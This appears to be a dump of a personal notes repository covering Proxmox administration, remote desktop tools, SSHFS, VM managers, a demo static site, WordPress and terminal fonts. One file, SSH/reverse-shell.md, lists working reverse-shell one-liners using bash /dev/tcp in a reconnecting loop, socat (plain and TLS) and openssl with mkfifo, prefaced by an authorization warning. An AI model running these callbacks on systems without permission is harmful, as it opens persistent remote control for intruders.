9 | **Great Resources of learning** 10 | - [Learn Linux TV](https://www.youtube.com/playlist?list=PLT98CRl2KxKHnlbYhtABg6cF50bYa8Ulo) 11 | 12 | **Installation** 13 | For Installation related topics read [this](./installation.md). 14 | 15 | **Post-Installation** 16 | For Post-Installation related topics read [this](./post-installation.md). 17 | 18 | **User Management** 19 | For User Management related topics read [this](./user-management.md). 20 | 21 | **Create VM/CT** 22 | 23 | - To create a VM read [this](./create-VM.md). 24 | - To create a CT read [this](./create-CT.md). 25 | 26 | **Templates** 27 | 28 | To create VM templates to standardize VM creation and reduce setup time read [this](./create-VM-template.md). 29 | 30 | To use CT templates for lightweight, fast deployment of containerized environments read [this](./create-CT-template.md). 31 | 32 | **CLI** 33 | To manage VMs/CTs from the CLI read [this](./cli.md). 34 | 35 | **Firewall** 36 | For Firewall related topics read [this](./firewall.md). 37 | 38 | **Networking** 39 | For Networking related topics read [this](./networking.md). 40 | 41 | ****Storage**** 42 | For Storage related topics read [this](./storage.md). 43 | 44 | **Backup & Snapshots** 45 | For Backup & Snapshots related topics read [this](./backup-and-snapshots.md). 46 | 47 | **Clustering** 48 | 49 | For Clustering related topics read [this](./clustering.md). 50 | 51 | **High Availability** 52 | For High Availability related topics read [this](./high-availability.md). 53 | -------------------------------------------------------------------------------- /Proxmox/create-CT-template.md: -------------------------------------------------------------------------------- 1 | # Create a CT template 2 | 3 | ## 1. Prepare CT 4 | 5 | Remove Unique System Identifiers. SSH host keys and machine-id are unique to each system. 6 | If left unchanged: 7 | 8 | - All VMs cloned from the template will share the same identity, which poses security risks and networking conflicts. 9 | - SSH connections may raise security warnings due to reused host keys. 10 | 11 | ### For Debian-based systems: 12 | ```bash 13 | # Make sure that the system is updated 14 | sudo apt update -y 15 | sudo apt dist-upgrade -y # Optional 16 | 17 | # Remove existing SSH host keys (they will be regenerated on first boot) 18 | sudo rm -rf /etc/ssh/ssh_host_* 19 | 20 | # Clear machine-id (should be empty) 21 | sudo truncate -s 0 /etc/machine-id 22 | 23 | # Ensure /var/lib/dbus/machine-id is a symlink to /etc/machine-id 24 | # sudo ln -sf /etc/machine-id /var/lib/dbus/machine-id 25 | 26 | # Make sure that /var/lib/dbus/machine-id is a symlink of /etc/machine-id 27 | ls -l /var/lib/dbus/machine-id 28 | 29 | # Make sure that /etc/machine-id is empty 30 | cat /etc/machine-id 31 | 32 | # Clean up unnecessary packages and cached files 33 | sudo apt clean 34 | sudo apt autoremove 35 | 36 | # Power off the CT 37 | sudo poweroff 38 | ``` 39 | 40 | ## 2. Convert the CT to a Template 41 | Right-click the powered-off CT > Select `Convert to Template`. 42 | 43 | ## 3. Create a CT from the Template 44 | 45 | 1. Right-click on the Template. 46 | 2. Select Clone. 47 | 3. Set the following: 48 | - **Mode**: Full Clone (recommended to make a complete copy) 49 | - Assign CT ID, Hostname, and Target Node 50 | 4. Click Clone 51 | 52 | 53 | ## 4. Regenerate SSH keys 54 | Connect to the CT and run the following commands 55 | 56 | ``` 57 | sudo rm -rf /etc/ssh/ssh_host_* 58 | sudo dpkg-reconfigure openssh-server 59 | ``` -------------------------------------------------------------------------------- /Proxmox/firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | Different Firewall levels 4 | - Datacenter 5 | - Node 6 | - VM/CT 7 | 8 | > [!IMPORTANT] 9 | > In order to work each level, the firewall for this layer should be enabled! 10 | 11 | Default Interface: `vmbr0` 12 | 13 | > [!CAUTION] 14 | > If Datacenter firewall rules is not set properly, access to Proxmox web UI can break. 15 | > 16 | > E.g. By enabling Datacenter firewall without adding rules 17 | > 18 | > To fix this issue (if happens): 19 | > 1. Connect via CLI 20 | > 2. Edit `/etc/pve/firewall/cluster.fw`. Set `enable: 0` 21 | > 22 | > To prevent it, add a Datacenter Rule: 23 | > - `Direction`: In 24 | > - `Action`: ACCEPT 25 | > - `Interface`: Give your interface 26 | > - `Enable`: [x] 27 | > - `Protocol`: tcp 28 | > - `Dest. port`: 8006 29 | 30 | > [!TIP] 31 | > You may want to enable also icmp protocol in Datacenter level, so you are able to ping the server. 32 | > - `Direction`: In 33 | > - `Action`: ACCEPT 34 | > - `Interface`: Give your interface 35 | > - `Enable`: [x] 36 | > - `Protocol`: icmp 37 | 38 | ## Add rule 39 | Select the component (Datacenter, Node or VM/CT) > `Firewall` > `Add` 40 | - `Direction`: In, our or Forward 41 | - `Action`: ACCEPT, REJECT or DROP 42 | - `Interface`: The target interface 43 | - `Enable`: If it is enabled 44 | - `Protocol`: Protocols like tcp, udp, icmp 45 | - `Macro`: Predefined macros like SSH 46 | - `Source`: Use CIDR format (/32 for single IP) 47 | 48 | ## Enable/Disable Firewall 49 | Select the component (Datacenter, Node or VM/CT) > `Firewall` > `Options` > `Firewall` > `Edit` > Set to on/off -------------------------------------------------------------------------------- /Proxmox/high-availability.md: -------------------------------------------------------------------------------- 1 | # High availability 2 | 3 | High availability in a nutshet: 4 | 5 | If a Node goes down --> The VMs?CTs will automatically start on another Node. 6 | 7 | > [!IMPORTANT] 8 | > In order to have High availability, at **least** 3 servers are required! 9 | 10 | **How it works?** 11 | Health checks are sent periodically and if a server is not reachable, then they other servers handle the extra needs. 12 | 13 | ## Enable HA for a VM 14 | 1. Make sure that the target VM has a shared storage as a disk (read [this](./clustering.md#enable-shared-storage)). 15 | 2. Shutdown VM 16 | 3. `Datacenter` > `HA` > `Add` 17 | - `VM`: Select target VM -------------------------------------------------------------------------------- /Proxmox/installation.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | 3 | ## 1. Target Hard Disk 4 | During installation, click on `Options` to customize the `filesystem` (e.g., **ZFS**) and set up any required **RAID** configuration. 5 | 6 | > [!Note] 7 | > **ZFS** is recommended if the system has more than 32GB of RAM. 8 | > It is ideal for production environments and systems requiring high performance. 9 | > 10 | > - ZFS is memory-intensive (recommended: 1 GB RAM per 1 TB of storage). 11 | > - Mixing disk sizes or replacing drives requires careful planning. 12 | > - Avoid using hardware RAID with ZFS — use ZFS-native RAID-Z instead. 13 | 14 | ## 2. Administration 15 | Specify an email address for receiving system notifications and alerts. 16 | 17 | ## 3. Network Configuration 18 | - **Hostname**: The name of the Proxmox server. 19 | - **IP Address**: Assign a static IP address outside of the router's DHCP range. 20 | 21 | ## 4. Web Access 22 | After installation, access the Proxmox Web GUI: 23 | 24 | `http://:8006` 25 | 26 | **Default Credentials:** 27 | - **Username**: `root` 28 | - **Password**: Set during installation 29 | -------------------------------------------------------------------------------- /Proxmox/post-installation.md: -------------------------------------------------------------------------------- 1 | # Post Installation 2 | 3 | ## Update Node 4 | 1. Select the node (top left panel). 5 | 2. Go to `Updates` > `Refresh`. 6 | 7 | ## Upgrade Node 8 | 1. `Updates` > `Refresh` 9 | 2. `Updates` > `Upgrade` 10 | 3. `Updates` > `Refresh` 11 | 4. Reboot the node. 12 | 13 | ## Subscription Repository 14 | If you don't plan to purchase a subscription: 15 | 16 | 1. Go to `Updates` > `Repositories` > `Add`. 17 | 2. Select `No-subscription` repository > `Add`. 18 | 3. [Upgrade node](#upgrade-node). 19 | 20 | If you do have a subscription: 21 | - Select the node > `Subscription` > `Upload Subscription Key`. 22 | -------------------------------------------------------------------------------- /Proxmox/storage.md: -------------------------------------------------------------------------------- 1 | # Storage 2 | 3 | In proxmox you can mount storage from remote servers (**shared storage**) to share resources. 4 | 5 | 6 | > [!INFO] 7 | > Since Proxmox runs on top of linux, you can use **samba** or **NFS**. 8 | 9 | --- 10 | 11 | ## Target 12 | 13 | We can create [nfs](https://en.wikipedia.org/wiki/Network_File_System) network storage in a technology, like: 14 | - Synology 15 | - TrueNAS 16 | - etc.. 17 | 18 | Then, mount the storage in Proxmox. 19 | 20 | --- 21 | 22 | ## Use Case 23 | 24 | We can use this approach to store files related to: 25 | - **Shared Storage** (High Availability) 26 | - **Back-ups** (Disaster recovery) 27 | 28 | > [!NOTE] 29 | > Keep in mind that, in most cases, backups occur occasionally, while shared storage is continuously used. 30 | > 31 | > Therefore, having a high-speed connection between your Proxmox nodes and the shared storage is essential for optimal performance. 32 | > 33 | > Consider using 10 GbE connections instead of standard Gigabit Ethernet, especially if you're working with high-throughput workloads or fast storage that should be accessible from multiple VMs. 34 | 35 | --- 36 | 37 | ### Connect NFS to the Datacenter 38 | 39 | As a prerequisite, you must already have an NFS storage available in your network. 40 | 41 | > [!IMPORTANT] 42 | > Make sure that the NFS storage in the server can be accessed by **root** user. 43 | 44 | `Datacenter` > `Storage` > `Add` > `NFS` 45 | - `ID`: A name for this share 46 | - `Server`: IP or Domain 47 | - `Export`: Server share dir full path 48 | - `Content`: What we plan to store there 49 | - For **BUs** select: `Disk image`, `Container template`, `Backup` and `Snippets` 50 | - For **Shared Storate** select: `Disk image`, `Container template` and `Container` 51 | 52 | -------------------------------------------------------------------------------- /RDP/README.md: -------------------------------------------------------------------------------- 1 | # Remote Desktop Protocol 2 | 3 | See [https://www.digitalocean.com/community/tutorials/how-to-enable-remote-desktop-protocol-using-xrdp-on-ubuntu-22-04](https://www.digitalocean.com/community/tutorials/how-to-enable-remote-desktop-protocol-using-xrdp-on-ubuntu-22-04) 4 | for more details. 5 | 6 | Installation: 7 | ``` 8 | sudo apt update 9 | 10 | # Installing a Desktop Environment on Ubuntu 11 | sudo apt install xfce4 xfce4-goodies -y 12 | 13 | # Installing xrdp on Ubuntu 14 | sudo apt install xrdp -y 15 | 16 | # Make sure that is running 17 | sudo systemctl status xrdp 18 | ``` 19 | 20 | Make sure that the firewall allows the port that RDP uses. 21 | 22 | Now logout from your main screen and connect via remmina or another app. -------------------------------------------------------------------------------- /RDP/Rustdesk.md: -------------------------------------------------------------------------------- 1 | # Rustdesk 2 | 3 | RustDesk is a free, open-source remote desktop application that allows users to access and control computers remotely. 4 | 5 | Download Rustdesk from [here](https://github.com/rustdesk/rustdesk/releases/tag/1.3.9) 6 | 7 | ## Internal LAN access 8 | Make sure that you have enabled the following setting. 9 | `Settings` > `Security` > `Security` > [x] `Enable direct IP access` 10 | 11 | ## Login screen 12 | Based on [this](https://rustdesk.com/docs/en/client/linux/#login-screen), Wayland is not supported. 13 | Hence, **uncomment** `WaylandEnable=false` in `/etc/gdm/custom.conf` or `/etc/gdm3/custom.conf`, then reboot. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Notes 2 | 3 | ## 🗒️ General Notes 4 | This repository contains a personal collection of notes and scripts, collected over the years, regarding different technologies and tools. 5 | 6 | ## 💡 Purpose 7 | The idea is to solve each problem once and minimize the time spent, or automate the process, of resolving the same problem in the future. 8 | 9 | ## 💬 What should I expect? 10 | Documentation about different technologies. For example, notes regarding different programming languages, such as [Rust](./Rust/), are available. There are also notes related to [Linux](./Linux/), [Debian](./Debian/), and even [SSH](./SSH/). 11 | 12 | Navigate to the different directories or search for keywords to find solutions or guidance on a given task. 13 | 14 | ## ❓ After that? 15 | If you have any further questions or need help with another topic, feel free to create a pull request. 16 | 17 | > [!NOTE] 18 | > TODO: Create an index for future expansion 19 | -------------------------------------------------------------------------------- /SSH/reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse shell 2 | 3 | > [!WARNING] 4 | > Use reverse shell only on systems that you have explicit authorization to access. 5 | 6 | ## 1. Using Bash 7 | **Listener** (the machine that wants to establish the ssh connection) 8 | ```bash 9 | nc -lvnp 10 | ``` 11 | 12 | From the **target** machine run one of the commands based on the use case. 13 | 14 | 1. Terminal 15 | ```bash 16 | while true; do bash -c "/bin/bash -i >& /dev/tcp// 0>&1" ; sleep 5 ; done 17 | ``` 18 | 19 | ## 2. Socat [Preferred] 20 | Reverse Shell with socat (recommended for stability). Socat is very reliable and supports full TTY and encryption (TLS) if needed. 21 | 22 | Installation 23 | ``` 24 | sudo apt install socat 25 | ``` 26 | 27 | On the **listener**: 28 | ``` 29 | socat file:`tty`,raw,echo=0 tcp-listen:,reuseaddr 30 | ``` 31 | 32 | On the **target** (your device): 33 | ``` 34 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:: 35 | ``` 36 | 37 | > [!CAUTION] 38 | > **DO NOT FORGET TO CONFIGURE YOUR FIREWALL TO ACCEPT TRAFFIC ON THE SPECIFIED PORT!"** 39 | 40 | ### How to add encryption: 41 | **Listener** 42 | ```bash 43 | # Create certificate 44 | openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem 45 | cat key.pem cert.pem > fullchain.pem 46 | 47 | # Start listener 48 | socat openssl-listen:,reuseaddr,fork,cert=cert.pem,key=key.pem,cafile=cert.pem,verify=0 file:`tty`,raw,echo=0 49 | ``` 50 | 51 | **Target** 52 | ```bash 53 | socat openssl-connect::,verify=0 exec:'bash -li',pty,stderr,setsid,sigint,sane 54 | ``` 55 | 56 | ## 4. OpenSSL 57 | A bit more complex but adds encryption. 58 | 59 | On the **listener**: 60 | ``` 61 | openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem 62 | openssl s_server -quiet -key cert.pem -cert cert.pem -port 63 | ``` 64 | 65 | On the **target**: 66 | ``` 67 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect : > /tmp/s 68 | ``` -------------------------------------------------------------------------------- /SSH/sshfs.md: -------------------------------------------------------------------------------- 1 | # SSHFS 2 | 3 | **SSHFS** stands for **SSH Filesystem** and it lets you mount a remote filesystem over **SSH** on your local machine as if it were a local folder. 4 | 5 | It’s part of **FUSE** **(Filesystem in Userspace)**, meaning you don't need kernel-level access, just a user with SSH access to the remote system. 6 | 7 | With **SSHFS**, you can browse, open, and edit files on a remote server securely over SSH as if they were on your local computer. 8 | 9 | Key Features 10 | 11 | - Secure (uses SSH encryption). 12 | - Lightweight and easy to set up. 13 | - No need for Samba, NFS, or FTP servers. 14 | - Read/write access (if permissions allow). 15 | - Great for development, backups, or remote file management. 16 | 17 | ## Installation 18 | 19 | Debian 20 | ```bash 21 | sudo apt install sshfs 22 | ``` 23 | 24 | Red Hat 25 | ```bash 26 | sudo dnf install sshfs 27 | ``` 28 | 29 | ## Mount 30 | ```bash 31 | sshfs @: 32 | ``` 33 | 34 | ### If there are errors 35 | #### Step 1. 36 | Make sure that fuse group exists and that your user is part of it 37 | ``` 38 | sudo groupadd fuse 39 | sudo usermod -aG fuse $USER 40 | ``` 41 | 42 | #### Step 2. 43 | Update configuration 44 | Edit `sudo vim /etc/fuse.conf` and uncomment `user_allow_other` option. 45 | 46 | #### Step 3 47 | Try using `allow_other` option. 48 | ```bash 49 | sshfs -o allow_other,uid=$(id -u),gid=$(id -g) \ 50 | @: 51 | ``` 52 | 53 | \* See this [url](https://askubuntu.com/questions/123215/sshfs-is-mounting-filesystems-as-another-user) 54 | 55 | #### Step 4 56 | Trubleshoot 57 | 58 | ```bash 59 | sshfs -o allow_other,debug,sshfs_debug,loglevel=debug,uid=$(id -u),gid=$(id -g) \ 60 | @: 61 | ``` 62 | 63 | ## Verify 64 | ```bash 65 | mount 66 | ``` 67 | 68 | ## Unmount 69 | ```bash 70 | umount 71 | # or preferred for this 72 | fusermount -u 73 | ``` -------------------------------------------------------------------------------- /Virtualization/Gnome-boxes/README.md: -------------------------------------------------------------------------------- 1 | # Gnome boxes 2 | 3 | **GNOME Boxes** is a simple VM management application designed for GNOME desktop environments. 4 | 5 | It lets you **easily** create, access, and manage VMs or remote desktops with a modern, user-friendly GUI. 6 | 7 | Think of it as a **lightweight**, **user-friendly** alternative to VirtualBox or virt-manager, especially suited for beginners and casual users. 8 | 9 | ## Installation 10 | 11 | ### Debian 12 | ``` 13 | sudo apt install gnome-boxes 14 | ``` 15 | 16 | ### Red Hat 17 | ``` 18 | sudo dnf install gnome-boxes 19 | ``` 20 | 21 | ## Under the Hood 22 | | Component | Purpose | 23 | | --------- | --------- | 24 | | libvirt | Provides VM lifecycle management 25 | | QEMU/KVM | Runs the actual VMs 26 | | SPICE/VNC | Enables remote desktop protocols 27 | | .iso images | Used to install guest OS -------------------------------------------------------------------------------- /Virtualization/Multipass/README.md: -------------------------------------------------------------------------------- 1 | # Multipass 2 | **Multipass** is a lightweight VM manager developed by Canonical, designed to quickly launch and manage Ubuntu VMs on your local machine. 3 | 4 | It’s like a super-simplified alternative to tools like **VirtualBox**, **Docker**, or **Vagrant**, but specifically for Ubuntu and Ubuntu images. 5 | 6 | ## Installation 7 | 8 | ``` 9 | sudo snap install multipass 10 | ``` 11 | 12 | ## Commom Commands 13 | 14 | | Command | Description | Example | 15 | |--------|-------------|---------| 16 | | `multipass find` | List all available Ubuntu images | `multipass find` | 17 | | `multipass launch -c -d -m -n ` | Launch a new instance with specified resources and name | `multipass launch 22.04 -c 2 -m 2G -d 10G -n my-vm` | 18 | | `multipass list` | Show all instances and their current status | `multipass list` | 19 | | `multipass info ` | Show detailed information about a specific instance | `multipass info my-vm` | 20 | | `multipass shell ` | Open an interactive shell inside the instance | `multipass shell my-vm` | 21 | | `multipass exec -- ` | Run a command inside the instance from the host | `multipass exec my-vm -- ls /home/ubuntu` | 22 | | `multipass stop ` | Stop a running instance | `multipass stop my-vm` | 23 | | `multipass start ` | Start a stopped instance | `multipass start my-vm` | 24 | | `multipass delete ` | Delete a stopped instance | `multipass delete my-vm` | 25 | | `multipass purge` | Remove all deleted instances and reclaim disk space | `multipass purge` | 26 | | `multipass set =` | Set configuration options for Multipass | `multipass set local.driver=qemu` | 27 | 28 | --- 29 | 30 | ## Known issues 31 | ``` 32 | ERROR: ld.so: object 'libgtk3-nocsd.so.0' from LD_PRELOAD cannot be preloaded (failed to map segment from shared object): ignored. 33 | ``` 34 | 35 | \* libgtk3-nocsd is commonly used to disable client-side decorations (CSD) in GTK3 applications, forcing them to use traditional window manager decorations. -------------------------------------------------------------------------------- /Web/CSS.md: -------------------------------------------------------------------------------- 1 | # CSS 2 | 3 | ## Spacing 4 | ```mermaid 5 | %%{init: {'theme':'neutral'}}%% 6 | flowchart LR 7 | subgraph Margin 8 | subgraph Border 9 | subgraph Padding 10 | Content 11 | style Content fill:#def2d6 12 | end 13 | style Padding fill:#f7f2d5 14 | end 15 | style Border fill:#507489 16 | end 17 | style Margin fill:#fdb31c 18 | ``` -------------------------------------------------------------------------------- /Web/server/static-demo-website/css/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: "Roboto", sans-serif; 3 | margin: 0; 4 | padding: 0; 5 | background: #f9f9f9; 6 | color: #333; 7 | } 8 | header { 9 | background: linear-gradient(90deg, #6a11cb, #2575fc); 10 | color: #fff; 11 | padding: 20px; 12 | text-align: center; 13 | } 14 | header h1 { 15 | margin: 0; 16 | font-size: 2.5rem; 17 | } 18 | main { 19 | padding: 20px; 20 | display: flex; 21 | flex-direction: column; 22 | align-items: center; 23 | } 24 | section { 25 | max-width: 800px; 26 | margin-bottom: 20px; 27 | background: #fff; 28 | padding: 15px; 29 | border-radius: 8px; 30 | box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); 31 | } 32 | section h2 { 33 | margin-top: 0; 34 | color: #6a11cb; 35 | } 36 | ul { 37 | padding-left: 20px; 38 | } 39 | footer { 40 | background: #333; 41 | color: #fff; 42 | padding: 10px; 43 | text-align: center; 44 | } 45 | footer p { 46 | margin: 0; 47 | } 48 | @media (min-width: 768px) { 49 | main { 50 | flex-direction: row; 51 | flex-wrap: wrap; 52 | justify-content: center; 53 | } 54 | section { 55 | flex: 0 0 45%; 56 | margin: 10px; 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /Web/server/static-demo-website/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Modern HTML Page 7 | 8 | 9 | 10 | 11 |
12 |

Welcome to this testing Page

13 |
14 |
15 |
16 |

About

17 |

If you are here, then Congrats! You can host static websites!

18 |
19 |
20 |

Features

21 |
    22 |
  • HTTP server is installed on your system
  • 23 |
  • HTTP server is up and running
  • 24 |
  • Your firewall rules provide access to the proper port
  • 25 |
  • You can fetch multiple files properly
  • 26 |
27 | 28 |
29 |
30 |
31 |

© 2025 Used for verification. Built with ❤️

32 |
33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /Web/server/static-demo-website/js/function.js: -------------------------------------------------------------------------------- 1 | function showAlert() { 2 | alert("Button was clicked!"); 3 | } 4 | -------------------------------------------------------------------------------- /Wordpress/README.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | 3 | ## Wordpress Admin 4 | `https:/wp-admin` 5 | 6 | ## Clean start 7 | 1. Delete all Posts 8 | 2. Delete all pages 9 | 3. (After installing the first theme) Delete all other themes, and enable auto-updates 10 | 4. Deactivate and uninstall default plugins 11 | 5. `Dashboard` > `Screen options` > deactivate aux 12 | 6. `Settings` 13 | 1. `General` > Set `Site Title`, `Tagline` and `Site Icon` 14 | 2. `Permalinks` > Select `Post name` and then delete `/` at the end of `Custom Structure` to make it more clean (Important for sites with blog posts) 15 | 16 | --- 17 | 18 | ## Useful online tools 19 | ### Free Content for commercial use without needed attribution. 20 | - [Pexels](https://www.pexels.com/) 21 | - [Unsplash](https://unsplash.com/) 22 | - [Pixabay](https://pixabay.com/) 23 | 24 | ### Converter 25 | - [Freeconvert](https://www.freeconvert.com/) 26 | 27 | --- 28 | 29 | ## Themes 30 | ### Featured 31 | - Astra 32 | 33 | ## Plugins 34 | - `Starter templates`: 35 | - `Elementor`: Page builder 36 | - `Simply Static`: Convert wp site to static 37 | 38 | --- 39 | 40 | -------------------------------------------------------------------------------- /ZSH/fonts.md: -------------------------------------------------------------------------------- 1 | # FONTS 2 | 3 | Many terminal themes, such as `agnoster`, recommend using patched Nerd Fonts like **MesloLGS NF** to properly render Powerline symbols and icons. 4 | 5 | --- 6 | 7 | ## Powerline Fonts 8 | 9 | ### Installation 10 | 11 | #### Option 1: Install via APT (for Ubuntu/Debian) 12 | ```bash 13 | sudo apt-get install fonts-powerline 14 | ``` 15 | 16 | #### Option 2: Manual Installation from GitHub 17 | ```bash 18 | cd ~ 19 | git clone https://github.com/powerline/fonts.git --depth=1 20 | cd fonts 21 | ./install.sh 22 | cd .. 23 | rm -rf fonts 24 | ``` 25 | 26 | --- 27 | 28 | ### Verifying Installation 29 | 30 | To confirm that Powerline fonts are installed: 31 | ```bash 32 | fc-list | grep -i powerline 33 | ``` 34 | 35 | Expected output: 36 | ```bash 37 | /usr/share/fonts/truetype/powerline-symbols/PowerlineSymbols.otf: PowerlineSymbols:style=Regular 38 | ``` 39 | 40 | --- 41 | 42 | ### Configuring Terminal to Use Powerline-Compatible Fonts 43 | 44 | 1. Open your terminal's **Preferences** 45 | 2. Select your active **Profile** 46 | 3. Navigate to the **Text** or **Font** settings 47 | 4. Enable **Custom Font** 48 | 5. Choose a Nerd Font such as: 49 | - MesloLGS NF 50 | - Fira Code Nerd Font 51 | - Hack Nerd Font 52 | 53 | Ensure the selected font supports Powerline symbols. 54 | 55 | --- 56 | 57 | ### Testing Font Rendering 58 | 59 | Run the following to test Powerline glyph rendering: 60 | ```bash 61 | echo "\uE0B0 \uE0B1 \uE0B2 \uE0B3 \uE0A0 \uE0A1 \uE0A2" 62 | ``` 63 | 64 | If configured correctly, this should display a series of special symbols. If you see boxes or question marks instead, the font is either missing or not active in your terminal. 65 | 66 | --------------------------------------------------------------------------------